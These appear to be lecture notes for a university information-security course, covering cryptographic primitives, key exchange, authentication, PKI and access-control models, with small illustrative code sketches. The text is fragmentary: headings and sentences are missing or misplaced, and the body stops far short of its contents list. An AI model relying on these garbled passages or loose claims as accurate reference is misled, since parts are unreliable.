COS432 InfoSec
Contents

1 Message Integrity
    Sending messages
    Do PRFs exist?
    Cryptographic Hash Functions
    Timing Attacks
    Multiple Alice - Bob messages
2 Randomness
    Randomness as a system service
    Message Confidentiality
    Confidentiality and integrity
3 Block ciphers
    128-bit AES
    How to handle variable-size messages
4 Asymmetric key cryptography
5 Key Management
    How big should keys be?
    Key management principles
6 Authenticating people
    Something you know: passwords
    Something you have
    Something you are
7 SSL/TLS and Public Key Infrastructure
    Certificates
    Naming and identity verification
    Anchoring
    Revocation
8 Access control
    Subjects and labels
    Traditional Unix File Access
    Capabilities
    Logic-based authorization
9 Information flow and multi-level security
10 Securing network infrastructure
11 Spam
    Economics of spam
    Anti-spam strategies
12 Web Security
    Browser execution model
    Cookies
    CSRF: Cross-Site Request Forgery
    Cross Site Scripting (XSS)
    SQL injection
13 Web Privacy
    Third parties
    Tagging
    Fingerprinting
    More ways for websites to get your identity
    How security bugs contribute to online tracking
    Defenses
14 Electronic voting
15 Backdoors in crypto standards
20 Big data and privacy
21 Economics of Security
    Definitions of Efficiency
    Market Failures
    Solutions to Market Failures
22 Human Factors in Security
23 Quantum Computing
    Classical Bits
    Quantum Bits (qubits)
    Multi-qubit systems
    Advantages of QC
    Implications for crypto
    Quantum Key Exchange
24 Password Cracking
    Elementary Methods
    Rainbow Tables
1 Message Integrity
Sending messages
Alice ──m──→ Mallory ──?──→ Bob
Threat model: what the adversary can do and accomplish vs. what we want to do and
accomplish. We generally assume that Mallory is malicious in the most devious possible
way, as opposed to causing random errors. In this case of Alice sending Bob a message:
• Mallory can see and forge messages
• Mallory wants to get Bob to accept a message that Alice didn’t send
• Alice and Bob want Alice to be able to send a message and have Bob receive it
in an untampered form.
CIA Properties
• Confidentiality: trying to keep information secret from someone
• Integrity: making sure information hasn’t been tampered with
• Availability: making sure system is there and running when needed (hardest to
achieve!)
What to send:
    input   output
    ∅       01011...   ← 256 coin flips
    0       101...
    1       ...
f is a secure MAC if and only if every efficient (polytime) strategy for Mallory
wins with only negligible probability (probability that goes to 0). In other words,
f is a secure MAC if Mallory can't do better than random guessing.
Kerckhoffs’s principle:
Use a public function family and a randomly chosen secret key. Advantages:
f is a PRF if and only if every efficient strategy for Mallory wins with probability
less than 0.5 + ε, where ε is negligible.
Note: Mallory can always win by exhaustive search over the range of k in f(k, x),
so we need to limit Mallory to "practical" (efficient) strategies.
Do PRFs exist?
They include MD5, SHA-1, SHA-?, etc.: functions that take arbitrary-size inputs and
return fixed-size outputs that are "hard to reverse." They are dangerous to use directly
because they don't have the properties you think/want them to have.
Timing Attacks
Suppose Alice and Bob implement MAC-based integrity with the following code
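A minimal sketch of the pitfall, in Python (function names are illustrative; HMAC-SHA256 stands in for the MAC f(k, m)): the naive comparison returns as soon as a byte differs, so its running time leaks how many leading bytes of a forged tag are correct, while the constant-time comparison does not.

    import hmac, hashlib

    def mac(key: bytes, message: bytes) -> bytes:
        return hmac.new(key, message, hashlib.sha256).digest()

    def verify_insecure(key: bytes, message: bytes, tag: bytes) -> bool:
        expected = mac(key, message)
        if len(tag) != len(expected):
            return False
        for a, b in zip(expected, tag):
            if a != b:        # returns at the first mismatching byte, so the running
                return False  # time reveals how many leading bytes were correct
        return True

    def verify_constant_time(key: bytes, message: bytes, tag: bytes) -> bool:
        # compare_digest examines every byte regardless of where mismatches occur
        return hmac.compare_digest(mac(key, message), tag)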
Multiple Alice - Bob messages
How to deal with Mallory sending messages out of order or resending old messages
1. append sequence number to each message:
Alice sends m'_0 = (0, m_0), m'_1 = (1, m_1)
2. switch keys per message
2 Randomness
Best way to get a value that is unknown to an adversary is to choose a random value,
but it’s hard to get this in practice. Randomness (or a lack thereof) is often a weakness
in a security system.
Two views:
1. family of functions fk (x)
2. function f (k, x). This is the view we’ll be using for this class.
True randomness:
• outcome of some inherently random process
• assume it “exists” but it’s scarce and hard to get
In security, ”random” means unpredictable:
• to whom? E.g., in a PRF, the result can be considered random with respect to
someone who does not know the secret key.
• when?
Pseudorandom generator (PRG):
• takes a small "seed" that's truly random as input, e.g. a few coin flips, instead
of flipping a coin each time
• generates a long sequence of “good enough” values, i.e. unlimited pseudoran-
domness.
• maintains “hidden state” that changes as generator operates
• output is indistinguishable from truly random output in the practical sense, i.e.
an efficient party cannot distinguish it from true randomness
• the generator needs to be deterministic, because if it is not it must be driven by
some kind of randomness, and the reason we are doing this is because randomness
is scarce
Randomness service:
• OS service, callable by application
Note that if an adversary breaks in at time t, they can play it forward and see the
outputs at time t + x
Most PRGs are made up of an init function to initialize state S and an advance
function to step to a new state.
NOTE: The advance function should be performed after generating an output, not
the other way around. If you do not advance after generating the output, the hidden
state that was used to generate the most recent output stays in memory. If at any time
between this and the next time you generate an output the adversary is able to
compromise your system, they learn the hidden state and can reconstruct
the last output (not backtracking resistant!).
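A minimal sketch of that init/advance structure, assuming HMAC-SHA256 as the underlying PRF (the function names init/output/advance are illustrative):

    import hmac, hashlib, os

    def prf(key: bytes, data: bytes) -> bytes:
        # HMAC-SHA256 standing in for an abstract PRF
        return hmac.new(key, data, hashlib.sha256).digest()

    def init(seed: bytes) -> bytes:
        return seed                      # state S starts as a truly random seed

    def output(state: bytes) -> bytes:
        return prf(state, b"output")     # pseudorandom output derived from S

    def advance(state: bytes) -> bytes:
        return prf(state, b"advance")    # new state; discard the old one

    state = init(os.urandom(32))
    out = output(state)
    state = advance(state)   # advance right after generating, so the state that
                             # produced `out` is no longer in memory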
Hard parts: getting seed, recovering from compromise, even if we don’t know whether
the state has been compromised. We want to be continuously recovering because we
might not notice a compromise.
Create a new function, recover(S, randomdata) → state
• recover/renew the state (mix fresh randomness in with hidden state) using PRF,
to re-establish secrecy of hidden state
NOTE: It is a mistake to add a single bit of fresh randomness at a time, since Mallory
can keep up with the 2 possibilities each time; but if we wait until we have a lot,
say 256 bits of randomness, then Mallory can't keep up (2^256 possibilities), even if
she knows the algorithm used.
Hard to estimate actual amount of entropy in pool, so wait for too much randomness
before mixing to remain conservative.
There's also a problem with "headless" machines, like servers, that don't have enough
sources of randomness to draw from.
Linux:
• /dev/random gives pure random bits, but have to wait
• /dev/urandom is output of PRG, renewed via “pure” randomness
The boot problem: At startup,
• least access to randomness (system is clean)
• highest demand for randomness (programs want keys)
Solutions (with their problems):
• save some randomness only accessible at boot:
hard to tell that this hasn’t been observed, or used on last boot
• connect to someone across network to give pseudorandomness:
want secure connection but don’t yet have key (okay if have just enough for that
key, or semi-predictable and hope Mallory doesn’t guess)
Message Confidentiality
Now we may have a (passive) adversary/eavesdropper Eve who can only listen:
Alice → Bob
↓
Eve
Message processing:
plaintext → E (encrypts, using key k) → ciphertext → D (decrypts, using key k) → plaintext
Goal: ciphertext does not convey anything about plaintext. Bob can recover text, Eve
cannot.
Semantic Security
“Encryption game” against Eve:
1. Allow Eve to pick pieces of plaintext x_i; we provide encryptions E_k(x_i) until she is satisfied.
2. Eve chooses two pieces of plaintext.
3. We flip a coin and encrypt one of them.
4. Eve guesses which one was encrypted; she wins if she is right.
We say that the encryption method is secure if Eve can't do better than random
guessing (50/50) plus a negligible ε. This is known as semantic security.
Note: if we were being more rigorous in our definitions, we would use a stronger defi-
nition of security for encryption here so that it’s easier to combine later with integrity.
However, the methods we are learning are secure by any of the definitions.
Confidentiality and integrity
A few approaches to combining encryption E and a MAC M:
1. Use E(x || M(x)) - SSL/TLS
2. Use E(x) || M(E(x)) - IPsec. This is the winner (because math).
3. Use E(x) || M(x) - SSH
If we have only one shared key, we seed the PRG with the shared key and then use
four values it produces as the keys for message sending (an encryption key and a MAC
key in each direction).
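A sketch of approach 2 (encrypt-then-MAC), with a toy PRF-in-counter-mode stream standing in for the encryption E and HMAC-SHA256 as the MAC M (all names illustrative; a real scheme would use AES and include a nonce so keystreams are never reused across messages):

    import hmac, hashlib

    def keystream(key: bytes, n: int) -> bytes:
        # toy stream cipher: PRF in counter mode (illustration only, not AES)
        out, ctr = b"", 0
        while len(out) < n:
            out += hmac.new(key, ctr.to_bytes(8, "big"), hashlib.sha256).digest()
            ctr += 1
        return out[:n]

    def encrypt(key: bytes, msg: bytes) -> bytes:
        return bytes(a ^ b for a, b in zip(msg, keystream(key, len(msg))))

    decrypt = encrypt   # XOR with the same keystream undoes the encryption

    def encrypt_then_mac(enc_key: bytes, mac_key: bytes, plaintext: bytes) -> bytes:
        ciphertext = encrypt(enc_key, plaintext)
        tag = hmac.new(mac_key, ciphertext, hashlib.sha256).digest()   # M(E(x))
        return ciphertext + tag                                        # E(x) || M(E(x))

    def verify_then_decrypt(enc_key: bytes, mac_key: bytes, data: bytes) -> bytes:
        ciphertext, tag = data[:-32], data[-32:]
        expected = hmac.new(mac_key, ciphertext, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):   # check integrity before decrypting
            raise ValueError("integrity check failed")
        return decrypt(enc_key, ciphertext)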
3 Block ciphers
Challenge: design a very hairy function that’s invertible, but only by someone who
knows the key. A PRP will have this property.
Add as many rounds as you want, alternating left and right rounds.
Why? Easy to invert since each round is its own inverse, so inverse of series of rounds
is the same series in reverse order. This makes it so that f can be as difficult as we
want and the process is still invertible, so why not make f a PRF?
Example. AES (Advanced Encryption Standard). Probably the best available today;
it was designed to overcome drawbacks of DES:
• software efficiency was a goal
• large, variable key size (128-, 192-, 256-bit variants)
• open, public process for choosing the cipher: a design contest run by NIST,
judged on pre-determined criteria
2002 - NIST chose Rijndael (Belgian designers)
128-bit AES
Think of the 128 bits as a 4×4 array of bytes. The round steps include:
2. row shift: shift the ith row left i steps; values that fall off wrap around within
the same row (circular shift). Spreads out the columns.
3. linear mix ("diffusion"): take each column, treat it as a 4-vector, and multiply
by a fixed matrix (specified in the standard). Mixes within each column.
4. key-addition step (key-dependent): XOR each byte with the corresponding byte
of the key.
Note: the key expansion could be a source of weakness (to get the ten keys
needed from one)
• to decrypt, do inverses in reverse order
Problems:
• padding - plaintext not a multiple of blocksize
• “cipher modes” - dealing with multi-block messages
Padding: the most important property is that the recipient can unambiguously tell
what is padding and what is not.
Good method: append the bits 10* until you reach the end of the block (to remove,
strip all trailing 0's, then the 1). Remember that you must add some padding (at
least one bit) to every message. This works similarly with bytes.
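A byte-level sketch of the 10* rule (one 0x80 marker byte, then zero bytes to fill the block); the block size and function names are assumptions for illustration:

    BLOCK = 16   # e.g. the AES block size in bytes

    def pad(msg: bytes) -> bytes:
        # at least one byte of padding is always added
        n = BLOCK - (len(msg) % BLOCK)
        return msg + b"\x80" + b"\x00" * (n - 1)

    def unpad(padded: bytes) -> bytes:
        # strip trailing zero bytes, then the single 0x80 marker
        return padded.rstrip(b"\x00")[:-1]

    assert unpad(pad(b"attack at dawn")) == b"attack at dawn"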
• ECB: C_i = E(k, P_i)
• randomized: C_i = (R_i, E(k, R_i ⊕ P_i)), with a fresh random R_i per block
• CBC (Cipher Block Chaining): C_i = E(k, C_{i−1} ⊕ P_i)
What about the first block? Generate a random value, the "initialization vector"
(IV), and prepend it to the message to serve as C_{−1}. Don't reuse an IV with the
same key, or the adversary could compare the first blocks of two ciphertexts to see
whether the plaintexts match; but random generation is good enough, and the same
key can be used over and over.
• CTR (Counter mode): Generally agreed on as best to use. Similar to a stream
cipher.
C_i = E(k, messageid || counter) ⊕ P_i
The messageid must be unique; then it's okay to reuse the key.
Note: this would not be forward secret as a PRG.
Reasons to use CTR over PRG: more efficient on commodity hardware and per-
haps you trust AES more than your PRF (even though you can’t prove it either
way).
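A sketch of the CTR construction, with a truncated HMAC standing in for the block cipher E (in practice E would be AES; all names are illustrative):

    import hmac, hashlib

    def E(key: bytes, block: bytes) -> bytes:
        # placeholder for the block cipher; a real implementation would use AES here
        return hmac.new(key, block, hashlib.sha256).digest()[:16]

    def ctr_encrypt(key: bytes, message_id: bytes, plaintext: bytes) -> bytes:
        out = bytearray()
        for i in range(0, len(plaintext), 16):
            counter = (i // 16).to_bytes(8, "big")
            pad = E(key, message_id + counter)               # E(k, messageid || counter)
            block = plaintext[i:i + 16]
            out += bytes(p ^ k for p, k in zip(block, pad))  # XOR with the plaintext block
        return bytes(out)

    # decryption is the same operation: XOR with the same keystream again
    ct = ctr_encrypt(b"k" * 16, b"msg-0001", b"attack at dawn")
    assert ctr_encrypt(b"k" * 16, b"msg-0001", ct) == b"attack at dawn"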
4 Asymmetric key cryptography
RSA algorithm
2. Define N = pq
Useful fact: if p, q are prime, then for all 0 < x < pq with gcd(x, pq) = 1,
x^{(p−1)(q−1)} mod pq = 1
RSA((e, N), x) = x^e mod N
RSA((d, N), x) = x^d mod N
Proof.
• It’s slow (∼1000x slower than symmetric); you’re exponentiating huge numbers
• Key is big (∼4k bits)
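A toy numeric check of the encrypt/decrypt identity defined above, with tiny primes purely for illustration (real RSA uses ~2048-bit moduli plus padding such as OAEP):

    # toy parameters for illustration only
    p, q = 61, 53
    N = p * q                    # N = pq = 3233
    phi = (p - 1) * (q - 1)      # (p-1)(q-1) = 3120
    e = 17                       # public exponent, coprime to phi
    d = pow(e, -1, phi)          # private exponent: e*d = 1 mod (p-1)(q-1) (Python 3.8+)

    x = 42
    c = pow(x, e, N)             # RSA((e, N), x) = x^e mod N
    assert pow(c, d, N) == x     # RSA((d, N), c) = c^d mod N recovers x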
Secure RSA
Problem 1:
Suppose (e, N) = (3, N). Given ciphertext 8 that was encrypted with (3, N), it's trivial
to see that x^3 mod N = 8 has x = 2: the message is so small that no modular reduction
happened, so the adversary just takes a cube root. This shows that you may run into
trouble when encrypting small messages.
Problem 2 (Malleability):
RSA((d, N), x) · RSA((d, N), y) mod N = RSA((d, N), xy), so the product of two signatures
is the signature for the message xy! An adversary could use this to win the game
defining security of the cipher.
Definition. Malleability
Adversary can manipulate ciphertext, get predictable result for decrypted plaintext.
This is usually bad, but sometimes we want a malleable cipher (for some application)
Lesser problems:
• Same plaintext results in same ciphertext (deterministic)
• No built-in integrity check
To solve all these problems, add a preprocessing step before encryption. The standard
way is called OAEP (Optimal Asymmetric Encryption Padding):
1. Generate a 128-bit random value r and run it through a PRG G
2. XOR the result with the message padded with 128 bits of zeros
3. Run that result through a PRF H, a hash function with an announced key
4. XOR that with the random bits r
5. Concatenate the two results and send to RSA encryption
Concretely, with r the 128-bit random value:
X = (message || 0^128) ⊕ G(r),    Y = r ⊕ H(X),    and X || Y goes to RSA encryption.
To decrypt, invert the steps to recover r′ and m′ || z′. Reject if z′ is not all zeros;
otherwise throw away r′ and let m′ be the result of the decryption. m′ should at this
point be equal to the original message.
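A simplified sketch of this structure (not the standardized OAEP: real OAEP uses MGF1 and specified hash parameters; here SHA-256 stands in for both G and H, and all names are illustrative):

    import hashlib, os

    K = 16   # 128 bits = 16 bytes

    def xor(a: bytes, b: bytes) -> bytes:
        return bytes(x ^ y for x, y in zip(a, b))

    def G(seed: bytes, n: int) -> bytes:
        # stretch the random seed to n bytes (counter-mode hash as a stand-in PRG)
        out, i = b"", 0
        while len(out) < n:
            out += hashlib.sha256(seed + i.to_bytes(4, "big")).digest()
            i += 1
        return out[:n]

    def Hf(data: bytes) -> bytes:
        # compress to 128 bits (stand-in for the keyed hash H)
        return hashlib.sha256(data).digest()[:K]

    def oaep_encode(m: bytes) -> bytes:
        r = os.urandom(K)                            # step 1: 128-bit random value
        x = xor(m + b"\x00" * K, G(r, len(m) + K))   # step 2: (m || 0^128) XOR G(r)
        y = xor(r, Hf(x))                            # steps 3-4: r XOR H(x)
        return x + y                                 # step 5: concatenate, then RSA-encrypt

    def oaep_decode(block: bytes) -> bytes:
        x, y = block[:-K], block[-K:]
        r = xor(y, Hf(x))                            # recover r'
        padded = xor(x, G(r, len(x)))                # recover m' || z'
        m, z = padded[:-K], padded[-K:]
        if z != b"\x00" * K:                         # reject if z' is not all zeros
            raise ValueError("invalid padding")
        return m

    assert oaep_decode(oaep_encode(b"hello")) == b"hello"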
Other things to clean up:
• Key size
– To get a big enough key space, need lots of possible primes
– Factoring is better than brute force
– Factoring algorithms might get better, so build in cushion in key size to
account for incremental improvements in these algorithms.
5 Key Management
US for a long time put restrictions on export of cryptographic software, the same
restrictions as munitions, requiring a special license.
Java, for example, would have liked to include crypto with its runtime libraries, but
it was hard to get a license. Possible solutions:
• plugin architecture: users could plug crypto in if they have their own
• design the libraries in a way convenient for people who want to implement their own
crypto (export a general-purpose math library without the export-control issues)
Alice                                               Bob
          agree on g, p (public), p = 2q + 1, q prime ("safe prime")
pick random a, 1 < a < p − 1                        pick random b, 1 < b < p − 1
          ────────────── g^a mod p ─────────────→
          ←───────────── g^b mod p ──────────────
compute (g^b mod p)^a mod p = g^ba mod p            compute (g^a mod p)^b mod p = g^ab mod p
(time runs downward)
Adversary’s best attack is to try to solve the discrete log problem. So Alice and Bob
know something that nobody else knows.
In practice, use H(g ab mod p) as a shared secret.
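A toy sketch of the exchange with tiny parameters, purely for illustration (real deployments use ~2048-bit safe primes):

    import hashlib, secrets

    p = 23                                 # safe prime: p = 2q + 1 with q = 11 prime
    g = 5                                  # generator mod p

    a = secrets.randbelow(p - 3) + 2       # Alice's secret, 1 < a < p - 1
    b = secrets.randbelow(p - 3) + 2       # Bob's secret,   1 < b < p - 1

    A = pow(g, a, p)                       # Alice sends g^a mod p
    B = pow(g, b, p)                       # Bob sends   g^b mod p

    assert pow(B, a, p) == pow(A, b, p)    # both compute g^ab mod p

    # in practice, hash the shared value: H(g^ab mod p)
    key = hashlib.sha256(pow(B, a, p).to_bytes(32, "big")).digest()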
BUT: this works against an eavesdropper ("passive adversary", "Eve") but is insecure
if the adversary can modify messages (a "man in the middle", "MITM", attack).
Upshot: D-H gives you a secret shared with someone.
Solution:
1. Rely on physical proximity or recognition to know who’s talking
2. Consistency check: check that A, B end up with the same value g^ab, or that A, B
saw the same messages.
How?
Use digital signature (by one party, typically the server)
If Bob can verify Alice’s signature, but not the other way around, this still works (say
Alice is a well-known server).
This gives two properties at once:
• A authenticates B or vice versa
• No MITM, so A and B have a shared secret
D-H and forward secrecy:
Suppose Alice, Bob already have a shared key and want to negotiate a new key. Then
they can do a simple D-H key exchange, protected by old key, then get new key.
If an adversary doesn’t know the old key, can’t tamper with the D-H messages. Even
if the adversary gets an old key, not knowing the old key in real time means Mallory
can’t attack the D-H exchange, and can only be a passive adversary. So Alice and Bob
get forward secrecy with relatively low cost.
Another problem, similar to MITM:
6 Authenticating people
SHA-3
NIST: in 2007 it started a new standardization effort to pick SHA-3;
Keccak was recently picked
• fast to implement in software, and really fast in hardware
• in practice, it will probably be implemented in software, but a brute-force search to
break it will probably be done in hardware – slight conspiracy theory that NIST
picked it so as to advantage attackers with larger resources
Guessing is a serious problem in practice: people pick lousy passwords, and attackers
get more powerful all the time by Moore’s law
Reducing guessability:
• hard to quantify guessability
• only sure way: make password random, chosen from a large space (these are
usually hard to remember)
• format rules (e.g. special character and at least one uppercase character)
• require password to be longer (probably better than format rules)
Password hygiene
• like key hygiene
• change periodically and avoid patterns (“password1”, “password2”, ...)
• expire idle sessions (walk-away problem)
• require old password to change password
What if user forgets password?
• if hashed password is stored, can only set a new one
• else, can tell them password, BUT how do you know it’s not an impostor?
• clever solution by Gmail: if all else fails, we’ll give you a new password, but you’ll
need to wait before trying to log in again. Then legitimate user may log in and
see a warning during that time
Preventing spoofing:
• multi-factor authentication: password + something else (e.g. token, app)
• Evidence-based (Bayesian) authentication: treat password entry as evidence, but
not 100% certainty
– then use as much other evidence as possible (e.g. geolocation)
– other examples: device identity, software version, behavior patterns (espe-
cially atypical behavior)
– if confidence is too low, get more evidence
• distinctive per-user display
• distinctive unspoofable action before login
Windows CTRL-ALT-DEL before every time you enter password, always taking
you to legitimate login screen
user (knows password p)                    system
          ──────────── name ────────────→
          ←──── r (random challenge) ─────
          ────────── PRF(p, r) ──────────→
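A sketch of this challenge-response exchange, with HMAC-SHA256 standing in for PRF(p, r) (names illustrative; a real system would store a password-derived key rather than the raw password):

    import hmac, hashlib, secrets

    def respond(password: bytes, challenge: bytes) -> bytes:
        # user side: compute PRF(p, r)
        return hmac.new(password, challenge, hashlib.sha256).digest()

    # system side: issue a fresh random challenge per login attempt
    challenge = secrets.token_bytes(16)
    # ... send `challenge` to the user, receive `response` back ...

    def verify(stored_password: bytes, challenge: bytes, response: bytes) -> bool:
        # the system can check the response only if it knows p (or a key derived from p)
        return hmac.compare_digest(respond(stored_password, challenge), response)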
Definition. biometric
Measuring aspect of user’s body: fingerprint, iris scan, retina scan, finger length, voice
properties, facial features, hand geometry, typing patterns, gait
Basic scheme:
• enroll user: take a few measurements, compute “exemplar”
• later, when user presents self, measure, compare to exemplar; compute “distance”
to exemplar
• if “close enough”, accept as valid user, else reject: tradeoff in threshold between
false accepts and false rejects
Drawbacks:
• hard/impossible to follow good key hygiene (can’t change aspects of user’s body)
• often requires physical presence
• spoofing attacks: make an image of the body part, faking temperature, inductance, etc.
(melted gummy bears moulded into finger shape...)
• measurement is only approximate (need to control false positives and false neg-
atives)
• publicly observable (e.g. DNA, fingerprints)
7 SSL/TLS and Public Key Infrastructure
Observations on trust
Another problem
How does Firefox know that Facebook's cert was signed by VeriSign? Because Facebook
said so!
So what if Facebook provides a different cert authority?
Theory: We would only accept it if we trust the new CA.
Practice: Firefox comes with a list of trusted CAs. However, if any one of them is
malicious, it can certify other malicious URLs and you are screwed.
Attacks
If there exists an adversary (let’s call it NSA, for non-specific adversary) and a rogue
CA, how might they MITM you?
1. Issue rogue certs for target sites
2. Select users to target, install MITM boxes at their ISP(s)
How are these attacks detected?
1. Browser remembers old cert and alerts server if “something’s wrong” ie. the new
one seems suspicious
2. Server notices lots of users logging in from the same IP (or better, the same
device fingerprint)
Because it's easily detected, having the NSA MITM you this way seems pretty uncommon.
Certificates
Binds an entity to a public key. Signed by some issuer (CA) and contains identity of
issuer and an expiration time.
How does a server obtain a cert? The server generates a key pair and signs its
public key and ID info with its private key to prove that server holds the private key;
also provides message authentication.
The CA verifies the server’s signature using the server’s public key. Hard problem:
How do you know that it’s actually the server that’s sending the info?
The CA then signs the server's public key with the CA key, which creates a binding. If
the server can verify the key, ID, and CA's signature, it's good to go.
Almost all SSL clients except browsers and key SSL libraries are broken, often in hi-
larious ways.
Three hard problems
1. Naming and identity verification. How do you know that whoever is requesting
a certificate is who they say they are?
2. Anchoring. Who are the roots that are trustworthy?
3. Revocation. If something goes wrong, how can they shut off a certificate?
Zooko’s Triangle
For any naming system, you want it to be unique, human-memorable, and decentral-
ized. Pick 2, because you can’t get all 3.
Example. Real names are not unique. Domain names are not decentralized. Onion
addresses are not human memorable.
Anchoring
Which roots should you trust? If you can issue certs, you can run MITM attacks on
certs.
Revocation
This is different from expiration (which is for normal key hygiene). It involves
1. Authenticating the revocation request
If you’re not careful, it is an easy DOS! Also can’t ask for an old key because the
entity might not have it.
Solution: Sign a revocation request every time you get a new key and “lock
away” this request. If anything happens, you can send the revocation request.
2. Keeping clients up to date
Offline model: Certificate revocation list; issue an “anti-certificate”
Online model: OCSP (online cert status protocol) is a CA’s server that can be
queried for certificate statuses in real time
Note that revocation often fails in practice. Most browsers only check for EV certs,
which can be 6 months out of date.
So what happens when a CA doesn’t respond? What should your browser do?
• Can’t just not give you access; this would mean that the entire internet is broken
when CA is down.
Sites like Facebook are probably better at keeping their site up than VeriSign. Also,
it’s an easy DOS attack to take down a CA.
Result: Browser just goes ahead if CA is down.
8 Access control
How you reason about and enforce rules about who’s allowed to do what in the system.
This deals with authorization (Does that person have permission?), not authentication
(Who is asking?).
Subjects are labeled, e.g. by userid. Alice runs a program written by Bob (example:
Alice uses a text editor written by Bob to edit Alice's secret file). What label
should the running program get?
– If treat as Alice: Bob’s code can send Alice’s secret data to Bob
– If treat as Bob: Alice can’t edit her secret file, can read Bob’s files
– If treat as Bob but special for this file: none of the labelling benefits
– If treat as intersection of privileges: get all the drawbacks
• Common approach in OS (e.g. Linux): setuid bit
– Bob decides whether program runs as himself or invoker
Store access control info:
• as AC matrix - note that this will be very sparse
• as “profiles” - for each user, list of what subject can do (i.e. row of AC matrix)
• as Access Control List (ACL) - for each object, list of (Verb, Subject) pairs (who
can do what to it). This is typically used because small and simple in practice.
Often, ACL are stored along with object.
Who sets policy?
• centralized (“mandatory”) - done by an authority
(+) done by a well-trained person
(+) might be required (ethical, legal, or contractual obligations)
(–) inflexible, slow
• decentralized (“discretionary”) - each object has an owner, owner set ACLs
(+) flexible
(–) every user makes security decisions (mistake-prone)
• mix - owner can choose, within limits set by centralized authority
Groups and Roles:
Group is a set of people with some logical basis; role is group with one member
Advantages:
• makes ACL smaller, easier to understand
• change in status naturally causes change in access to resources
• ACL encodes reason for access in system (i.e. why you have access)
Roles can be hidden temporarily, “wearing different hats” (useful for testing)
Traditional Unix File Access
The ACL for each file contains, for each operation (verb), a subset of {user, group,
everyone}; so every verb requires 3 bits.
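A small sketch reading the three bits per verb from a Unix mode value, using Python's stat module (the mode value 0o754 is illustrative):

    import stat

    mode = 0o754   # example mode: rwxr-xr--

    # one bit per verb (read, write, execute) for each of user, group, everyone
    user  = (bool(mode & stat.S_IRUSR), bool(mode & stat.S_IWUSR), bool(mode & stat.S_IXUSR))
    group = (bool(mode & stat.S_IRGRP), bool(mode & stat.S_IWGRP), bool(mode & stat.S_IXGRP))
    other = (bool(mode & stat.S_IROTH), bool(mode & stat.S_IWOTH), bool(mode & stat.S_IXOTH))

    print(user)    # (True, True, True)    -> rwx
    print(group)   # (True, False, True)   -> r-x
    print(other)   # (True, False, False)  -> r--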
Capabilities
Tradeoffs:
• cryptographic
(+) totally decentralized
(–) if capability leaks, big trouble
want some kind of revocation, but hard to do
• OS table
(+) can control flow of passage of capabilities
(+) revocation is much easier
(–) centralized, requires overhead, lack of flexibility,
Logic-based authorization
Lattice model
Definition. Lattice
(S, ⊑), where S is a set of states and ⊑ is a partial order such that for any a, b ∈ S
there is a least upper bound of a, b and a greatest lower bound of a, b.
partial order:
• reflexive: a ⊑ a
• transitive: if a ⊑ b and b ⊑ c, then a ⊑ c
• antisymmetric: if a ⊑ b and b ⊑ a, then a = b
least upper bound U of a, b:
• a ⊑ U and b ⊑ U, and for all V ∈ S, if a ⊑ V and b ⊑ V then U ⊑ V
greatest lower bound L of a, b:
• L ⊑ a and L ⊑ b, and for all V ∈ S, if V ⊑ a and V ⊑ b then V ⊑ L
Example. Lattices
1. linear chain of labels:
   public ⊑ confidential
   unclassified ⊑ classified ⊑ secret ⊑ top secret
2. compartments (e.g. project, client ID, job function):
   a state is a set of labels, ⊑ is the subset relation
3. org chart:
   a state is a node in the chart, ⊑ is the ancestor/descendant relation
4. combination/cross product of lattices:
   a state is (S_1, S_2), and (A_1, B_1) ⊑ (A_2, B_2) iff A_1 ⊑ A_2 and B_1 ⊑ B_2
At each point in the program, every variable has a state/label (that comes from the lat-
tice we’re using). Inputs are tagged with state. Outputs are tagged with a requirement.
States are propagated when code executes.
Example: a = b+c; State(a) = LUB(State(b), State(c)) [LUB = Least Upper Bound]
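A minimal sketch of this propagation over a linear-chain lattice (labels and names are illustrative):

    LEVELS = ["public", "confidential", "secret", "top secret"]

    def lub(x: str, y: str) -> str:
        # in a linear chain, the least upper bound is simply the higher of the two labels
        return x if LEVELS.index(x) >= LEVELS.index(y) else y

    state = {"b": "public", "c": "secret"}
    state["a"] = lub(state["b"], state["c"])   # a = b + c  =>  State(a) = LUB(State(b), State(c))

    def may_output(var: str, policy: str) -> bool:
        # output is allowed only if label(v) is at or below the required policy L
        return LEVELS.index(state[var]) <= LEVELS.index(policy)

    print(state["a"], may_output("a", "public"))   # secret False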
Before providing output, check that the state of the output value is consistent with
policy. (For example, only allowed to emit unclassified output.) Formally, ensure that
label(v) ⊑ L, where L is the required policy.
But this isn’t enough (only monitoring and rejecting when inconsistent with policy) –
“dog that didn’t bark”:
// State(a) = ‘‘secret’’
// State(c) = State(d) = public
b = c;
if (a > 5) b = d; // Requires static (compile-time) analysis to get right
output b; // Says something about a, so should be labelled as secret
Static analysis won’t catch all, but will catch some of the leaks.
Problem 1: conservative analysis leads to being overly cautious
Problem 2: timing might depend on values (can lead to covert channel attacks)
What if you can’t prevent a program from leaking the information it has?
Conservative assumption (contagion model): every programs leaks all its inputs to all
its outputs.
Bell-LaPadula model: lattice-based information flow for programs and files
• every program has a state (from lattice): what it’s allowed to access
• every file has a state: what it contains
• Rule 1: "No Read Up" - Program P can read File F only if State(F) ⊑ State(P)
• Rule 2: "No Write Down" - Program P can write File F only if State(P) ⊑ State(F)
Theorem. If State(F_1) ⊑ State(F_2) and the two rules are enforced, then information
from F_2 cannot leak into F_1.
Problems:
1. exceptions (need to make explicit loopholes in system to allow)
• declassify/unprotect old data
• what about encryption (hope ”secret” ciphertext doesn’t leak plaintext)
• aggregate/“anonymized” data
• policy decision to make exception
2. usability - system can’t tell you if there are classified files in a directory you’re
trying to delete or no space on disk for you to add a file
3. outside channels - people talk to each other outside the system
This, so far, has been about confidentiality. Can we do the same thing for integrity?
• State: level of trust in integrity of information
• ensure high-integrity data doesn’t depend on low-integrity inputs (try to avoid
GIGO problem)
Biba model: (B-LP for integrity)
• Label/state: how much we trust program with respect to integrity/how important
file is
• Rule 1: “No Read Down”
• Rule 2: “No Write Up”
B-LP model and Biba model at the same time?
• if use same labels for both (high confidentiality = high integrity), then no com-
munication between levels
• if different labels, then some information flows become possible, but could result
in being much more difficult for users
• result: usually focus on confidentiality or integrity and let humans worry about
this outside of the system
Back to crypto...
Secret sharing:
• divide a secret into "shares" so that all shares are required to reconstruct the secret
– 2-way: pick a large value M; the secret is some s, 0 ≤ s < M;
  pick r randomly, 0 ≤ r < M;
  the shares are r and (s − r) mod M;
  to reconstruct, add the shares mod M
– k-way: shares r_0, r_1, ..., r_{k−2} random, plus (s − (r_0 + ··· + r_{k−2})) mod M
  (sketched in code after this list)
– can also construct polynomials (of degree k − 1) such that k values are needed to
  reconstruct
